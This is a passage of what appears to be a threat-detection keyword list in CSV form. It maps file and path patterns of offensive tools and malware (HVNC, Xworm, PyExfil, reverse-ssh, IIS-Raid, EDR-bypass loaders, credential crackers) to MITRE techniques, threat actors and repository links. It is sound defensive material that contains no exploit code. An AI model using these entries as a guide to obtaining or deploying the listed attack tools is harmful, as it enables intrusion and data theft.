Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7968" "*/http-vuln-cve2017-5638.nse*",".{0,1000}\/http\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7969" "*/http-vuln-cve2017-5689.nse*",".{0,1000}\/http\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7970" "*/http-vuln-cve2017-8917.nse*",".{0,1000}\/http\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7971" "*/http-vulners-regex.nse*",".{0,1000}\/http\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","N/A","10","3297","553","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z","7972" "*/http-vuln-misfortune-cookie.nse*",".{0,1000}\/http\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7973" "*/http-vuln-wnr1000-creds.nse*",".{0,1000}\/http\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7974" "*/http-waf-detect.nse*",".{0,1000}\/http\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7975" "*/http-waf-fingerprint.nse*",".{0,1000}\/http\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7976" "*/http-webdav-scan.nse*",".{0,1000}\/http\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7977" "*/http-wordpress-brute.nse*",".{0,1000}\/http\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7978" "*/http-wordpress-enum.nse*",".{0,1000}\/http\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7979" "*/http-wordpress-users.nse*",".{0,1000}\/http\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7980" "*/http-xssed.nse*",".{0,1000}\/http\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7981" "*/huan.exe *",".{0,1000}\/huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","0","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","7982" "*/HuanLoader/*",".{0,1000}\/HuanLoader\/.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","1","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","7983" "*/HVNC.git*",".{0,1000}\/HVNC\.git.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","7984" "*/hvnc/ngrok.zip*",".{0,1000}\/hvnc\/ngrok\.zip.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","7985" "*/HVNC-Server.exe*",".{0,1000}\/HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","7986" "*/HWSyscalls.cpp*",".{0,1000}\/HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","7987" 
"*/hXOR.exe*",".{0,1000}\/hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","7988" "*/hXOR-Packer.git*",".{0,1000}\/hXOR\-Packer\.git.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","7989" "*/hydra -*",".{0,1000}hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","7990" "*/hyperion.exe*",".{0,1000}\/hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7991" "*/Hypnos.git*",".{0,1000}\/Hypnos\.git.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","7995" "*/hypobrychium.git*",".{0,1000}\/hypobrychium\.git.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z","7996" "*/iam__backdoor_users_password*",".{0,1000}\/iam__backdoor_users_password.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","7997" "*/iam__bruteforce_permissions/*",".{0,1000}\/iam__bruteforce_permissions\/.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","7998" 
"*/iam__privesc_scan*",".{0,1000}\/iam__privesc_scan.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","7999" "*/iamassumeroleenum.py*",".{0,1000}\/iamassumeroleenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","8000" "*/iat_obfuscation.exe*",".{0,1000}\/iat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8001" "*/iax2-brute.nse*",".{0,1000}\/iax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8002" "*/iax2-version.nse*",".{0,1000}\/iax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8003" "*/icap-info.nse*",".{0,1000}\/icap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8004" "*/icebreaker.git*",".{0,1000}\/icebreaker\.git.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","8005" "*/icebreaker.py*",".{0,1000}\/icebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","8006" "*/IceRat v 1.0.exe*",".{0,1000}\/IceRat\sv\s1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware 
RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8007" "*/icmp_exfiltration.py*",".{0,1000}\/icmp_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","#linux","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","8008" "*/id_reverse-ssh.pub*",".{0,1000}\/id_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","8009" "*/IdentifyDomainAdmins.ahk*",".{0,1000}\/IdentifyDomainAdmins\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","8010" "*/IdentifyGroupMembershipActiveUser.ahk*",".{0,1000}\/IdentifyGroupMembershipActiveUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - 
T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","8011" "*/IDiagnosticProfileUAC*",".{0,1000}\/IDiagnosticProfileUAC.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","8012" "*/iec-identify.nse*",".{0,1000}\/iec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8013" "*/ielocalserver.dll*",".{0,1000}\/ielocalserver\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8014" "*/iepv.exe*",".{0,1000}\/iepv\.exe.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8015" "*/ieshell32.dll*",".{0,1000}\/ieshell32\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8016" "*/Ignis RAT V1_YKW.exe*",".{0,1000}\/Ignis\sRAT\sV1_YKW\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8017" "*/IHxExec.exe*",".{0,1000}\/IHxExec\.exe.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","8018" "*/IHxExec.git*",".{0,1000}\/IHxExec\.git.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","8019" "*/IHxExec-main.zip*",".{0,1000}\/IHxExec\-main\.zip.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","8020" "*/iis_controller.py*",".{0,1000}\/iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","8021" "*/IIS-Raid.git*",".{0,1000}\/IIS\-Raid\.git.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","8022" "*/ike-crack.*",".{0,1000}\/ike\-crack\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8023" "*/Ikeext-Privesc.git*",".{0,1000}\/Ikeext\-Privesc\.git.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","8024" "*/IKEForce*",".{0,1000}\/IKEForce.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/SpiderLabs/ikeforce","1","0","#linux","N/A","N/A","3","241","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z","8025" "*/ike-version.nse*",".{0,1000}\/ike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8026" "*/imap-brute.nse*",".{0,1000}\/imap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - 